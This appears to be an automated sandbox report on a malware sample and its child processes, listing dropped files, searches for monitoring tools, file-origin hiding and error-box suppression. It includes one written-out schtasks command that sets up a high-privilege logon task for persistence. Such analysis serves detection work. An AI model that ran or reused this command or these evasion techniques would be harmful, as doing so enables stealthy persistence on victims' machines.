Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	File created: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\StlpMt45.dll	Jump to dropped file
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	File created: C:\Users\user\AppData\Roaming\Servicewriter\libglib-2.0-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\28qbTrm[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1081819001\kzTq7Bt.exe	Jump to dropped file
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	File created: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\loudmouth.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	File created: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\MindClient.dll	Jump to dropped file
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	File created: C:\Users\user\AppData\Roaming\Servicewriter\Vcl60.bpl	Jump to dropped file
Source: C:\Users\user\Desktop\random.exe	File created: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Jump to dropped file
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	File created: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\Rtl60.bpl	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	File created: C:\Users\user\AppData\Roaming\Servicewriter\BorlndMm.dll	Jump to dropped file
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	File created: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\libglib-2.0-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	File created: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\wspconfig.dll	Jump to dropped file
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	File created: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\CC3260MT.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1080595001\w3Xwk4R.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\kzTq7Bt[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1080595001\w3Xwk4R.exe	File created: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1081729001\spoDnGT.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	File created: C:\Users\user\AppData\Roaming\SubDir\services.exe	Jump to dropped file
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	File created: C:\Users\user\AppData\Roaming\Servicewriter\Rtl60.bpl	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\GWZ8arC[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\random.exe	File created: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\0LGvvQO[1].exe	Jump to dropped file
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	File created: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\Ride.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	File created: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	Jump to dropped file
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	File created: C:\Users\user\AppData\Roaming\Servicewriter\wspconfig.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\spoDnGT[1].exe	Jump to dropped file
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	File created: C:\Users\user\AppData\Roaming\Servicewriter\TiVoServer.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	File created: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\BorlndMm.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\w3Xwk4R[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1080446001\KQlljCB.exe	Jump to dropped file
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	File created: C:\Users\user\AppData\Roaming\Servicewriter\loudmouth.dll	Jump to dropped file
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	File created: C:\Users\user\AppData\Roaming\Servicewriter\StlpMt45.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\KQlljCB[1].exe	Jump to dropped file
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	File created: C:\Users\user\AppData\Roaming\Servicewriter\CC3260MT.dll	Jump to dropped file
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	File created: C:\Users\user\AppData\Roaming\Servicewriter\MindClient.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	File created: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\libglib-2.0-0.dll	Jump to dropped file
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	File created: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\Vcl60.bpl	Jump to dropped file
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	File created: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\Ride.dll	Jump to dropped file
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	File created: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\wspconfig.dll	Jump to dropped file
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	File created: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\StlpMt45.dll	Jump to dropped file
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	File created: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\CC3260MT.dll	Jump to dropped file
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	File created: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\loudmouth.dll	Jump to dropped file
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	File created: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\MindClient.dll	Jump to dropped file
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	File created: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\BorlndMm.dll	Jump to dropped file
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	File created: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1080595001\w3Xwk4R.exe	File created: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	Jump to dropped file
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	File created: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\Rtl60.bpl	Jump to dropped file

Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	File created: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\Rtl60.bpl	Jump to dropped file
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	File created: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\Vcl60.bpl	Jump to dropped file
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	File created: C:\Users\user\AppData\Roaming\Servicewriter\Rtl60.bpl	Jump to dropped file
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	File created: C:\Users\user\AppData\Roaming\Servicewriter\Vcl60.bpl	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\random.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\services.exe" /rl HIGHEST /f

Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	File opened: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe:Zone.Identifier read attributes \| delete
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	File opened: C:\Users\user\AppData\Roaming\SubDir\services.exe:Zone.Identifier read attributes \| delete
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	File opened: C:\Users\user\AppData\Roaming\SubDir\services.exe:Zone.Identifier read attributes \| delete

Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
